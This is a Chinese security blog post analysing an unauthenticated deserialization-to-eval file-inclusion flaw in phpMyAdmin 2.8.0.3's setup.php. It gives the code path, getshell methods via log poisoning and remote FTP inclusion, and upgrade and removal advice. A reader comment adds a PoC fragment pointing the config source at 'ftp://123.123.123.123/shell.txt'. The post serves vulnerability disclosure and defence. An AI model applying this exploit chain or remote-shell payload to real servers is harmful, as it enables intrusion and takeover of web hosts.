PhpMyAdmin某版本无需登录任意文件包含导致代码执行(可getshell)漏洞分析

前言

这个漏洞来源于路人甲在wooyun提交的漏洞

漏洞编号: WooYun-2016-199433

1x

4月12日也曾在t00ls发表过,但是帖子关闭了

(详细漏洞文档可进群索取)

分析

存在漏洞的已知版本为 2.8.0.3 其余版本未知

本次测试的版本为2.8.0.3

看存在漏洞的文件代码

/scripts/setup.php

图片1

把传入的configuration给反序列化,而这个setup.php中引入了common.lib.php

来到common.lib.php

图片2

common.lib.php中引入了Config.class.php

再看看Config.class.php:

图片3

继续看load方法:

图片4

Config.class.php中含有__wakeup魔术方法,因此可以构造序列化参数,造成反序列化漏洞

所以整个思路就是:

setup.php->common.lib.php->Config.class.php->__wakeup()->load()->eval();

漏洞验证

构造个简单的poc:

5

测试在mac下:

图片5

Win下:

图片6

提供一个PHP版PoC:

POC

Getshell

  • 利用方式一

但是经过分析这个漏洞是不能读取php文件的,因为有了eval(),相当于任意文件包含了,不过另一方面这也是有好处的,如果能写入文件,文件中包含一个一句话就可以直接getshell了。作者给的方式是用error log。

根据作者的方法,使用默认环境,才发现有点鸡肋,比如,在ubuntu下,一般是不允许用root权限运行,实际测试中,我们是无法读取access.log的,所以getshell就比较困难。在windows下,由于几乎所有的浏览器和python模块都会很“自觉地”将特殊字符编码进行转换”,getshell就更困难了,所以只能用socket去构造shell。

 

图片7

Access log中就出现了shell了。

图片8

再用任意文件包含漏洞去包含,就可以拿到shell了。

图片9

  • 利用方式二

PoC修改为如下:

poc2

通过FTP直接远程利用获取shell

前提是看file_get_contents可不可以远程(默认是开启的)

感谢passenger提供思路

影响范围

存在漏洞的已知版本为 2.8.0.3 其余版本未知

许多内网的系统都在用这个版本,外网的也绝非少数!

修复建议

  • 尽快升级到最新版
  • 将setup.php中28行中的”configuration”改为传入其他值
  • 直接删除scripts目录,防止被恶意攻击。

*作者:ArriSec Team ,未经允许禁止转载!

原创文章,作者:ArriSecTeam,如若转载,请注明出处:http://www.mottoin.com/87915.html

发表评论

登录后才能评论

评论列表(2条)

  • Passenger
    Passenger 2016年8月23日 下午10:02

    source = ‘ftp://123.123.123.123/shell.txt’;
    $str=serialize($t);
    print_r($str);

    ?>
    明显可以使用ftp啊,可以直接远程利用了。

    • Moto
      Moto 2016年8月23日 下午10:37

      感谢提供思路,不过远程利用的前提是看file_get_contents可不可以远程(默认是开启的),文章已更新。

联系我们

021-62666911

在线咨询:点击这里给我发消息

邮件:root@mottoin.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code